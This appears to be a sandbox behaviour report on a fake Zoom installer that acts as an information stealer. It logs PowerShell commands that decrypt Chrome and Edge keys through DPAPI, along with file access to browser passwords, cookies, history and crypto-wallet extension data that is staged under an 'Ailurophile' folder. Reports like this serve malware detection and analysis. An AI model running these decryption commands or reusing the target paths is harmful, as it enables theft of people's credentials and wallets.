Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\BPMLNOBVSB VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\FENIVHOIKN VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\My Music VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\My Videos VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\UMMBDNEQBN VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\WUTJSCBCFX VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Desktop\FENIVHOIKN VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Desktop\NWTVCDUMOB VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Downloads VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Autofills VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\History VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Passwords VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Wallets VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\ZoomInstaller.exe File created: C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txt
Source: C:\Users\user\Desktop\ZoomInstaller.exe File created: C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txt
Source: C:\Users\user\Desktop\ZoomInstaller.exe File created: C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txt
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Neon\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigli
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
